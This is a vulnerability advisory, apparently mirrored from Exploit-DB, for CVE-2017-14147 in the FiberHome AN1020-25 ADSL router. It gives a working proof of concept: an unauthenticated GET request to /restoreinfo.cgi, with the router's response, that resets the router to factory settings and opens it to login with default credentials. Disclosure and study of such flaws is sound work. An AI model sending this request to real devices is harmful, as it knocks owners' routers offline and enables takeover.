扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 |
Title: ==== FiberHome Unauthenticated ADSL Router Factory Reset. Credit: ====== Name: Ibad Shah Twitter: @BeeFaauBee09 Website: beefaaubee09.github.io CVE: ===== CVE-2017-14147 Date: ==== 05-09-2017 (dd/mm/yyyy) About FiberHome: ====== FiberHome Technologies is a leading equipment vendor and global solution provider the field of information technology and telecommunications. FiberHome Deals in fiber-optic communications, data networking communications, wireless communication, and intelligentizing applications. In particular, it has been providing end-to-end solutions integrated with opto-electronic devices, opticpreforms, fiber & cables, and optical communication systems to many countries around the world. Products & Services: Wireless 3G/4G broadband devices Custom engineered technologies Broadband devices URL : http://www.fiberhomegroup.com/ Description: ======= This vulnerability in AN1020-25 router enables an anonymous unauthorized attacker to bypass authentication & access Resetting Router to Factory Settings, resulting in un-authorized operation & resetting it to Factory state. It later allows attacker to login to Router's Main Page with default username & password. Affected Device Model: ============= FiberHome ADSL AN1020-25 Exploitation-Technique: =================== Remote Details: ======= Below listed vulnerability enables an anonymous unauthorized attacker to reset router to it's factory settings & further access router admin page with default credentials. 1) Bypass authentication and gain unauthorized access vulnerability - CVE-2017-14147 Vulnerable restoreinfo.cgi Proof Of Concept: ================ PoC : GET /restoreinfo.cgi HTTP/1.1 Host: 192.168.1.1 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.8 Connection: close HTTP/1.1 200 Ok Server: micro_httpd Cache-Control: no-cache Date: Sat, 01 Jan 2000 00:12:39 GMT Content-Type: text/html Connection: close <html> <head> <meta HTTP-EQUIV='Pragma' CONTENT='no-cache'> <link rel=stylesheet href='https://www.exploit-db.com/exploits/42649/stylemain.css' type='text/css'> <link rel=stylesheet href='https://www.exploit-db.com/exploits/42649/colors.css' type='text/css'> <script language="javascript"> <!-- hide function restore() { var enblPopWin = '0'; var loc = 'main.html'; var code = 'window.top.location="' + loc + '"'; if ( enblPopWin == '1' ) { loc = 'index.html'; code = 'location="' + loc + '"'; } eval(code); } function frmLoad() { setTimeout("restore()", 60000); } // done hiding --> </script> </head> <body onLoad='frmLoad()'> <blockquote> <b>DSL Router Restore</b><br><br> The DSL Router configuration has been restored to default settings and the router is rebooting.<br><br> Close the DSL Router Configuration window and wait for 2 minutes before reopening your web browser. If necessary, reconfigure your PC's IP address to match your new configuration. </blockquote> </body> </html> Credits: ======= Ibad Shah, Taimooor Zafar, Owais Mehtab |
体验盒子
